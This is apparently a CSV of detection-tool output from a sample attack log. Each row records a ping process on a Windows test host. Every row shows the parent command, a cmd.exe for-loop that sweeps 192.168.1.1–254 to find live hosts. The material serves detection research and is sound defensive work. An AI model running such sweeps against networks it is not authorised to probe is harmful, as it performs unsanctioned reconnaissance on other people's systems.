2019-07-19 23:51:58.020 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.47  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:51:58.457 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.48  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:51:59.001 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.49  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:51:59.537 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.50  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:00.063 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.51  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:00.515 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.52  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:00.940 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.53  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:01.546 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.54  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:02.018 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.55  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:02.565 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.56  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:03.059 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.57  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:03.520 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.58  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:04.024 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.59  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:04.522 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.60  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:05.036 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.61  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:05.516 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.62  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:06.019 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.63  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:06.440 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.64  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:07.053 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.65  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:07.413 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.66  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:08.043 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.67  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:08.500 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.68  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:09.012 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.69  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:09.474 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.70  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:10.014 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.71  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:10.522 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.72  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:11.031 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.73  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:11.504 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.74  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:12.023 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.75  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:12.547 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.76  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:13.030 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.77  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:13.489 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.78  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:14.036 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.79  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:14.552 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.80  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:15.051 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.81  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:15.548 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.82  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:16.040 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.83  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:16.584 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.84  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:17.041 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.85  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:17.511 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.86  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:18.015 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.87  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:18.509 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.88  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:18.990 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.89  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:19.541 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.90  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:20.006 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.91  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:20.543 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.92  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:21.036 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.93  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:21.488 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.94  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:22.030 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.95  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:22.542 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.96  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:23.037 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.97  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:23.534 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.98  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:24.026 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.99  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:24.521 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.100  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
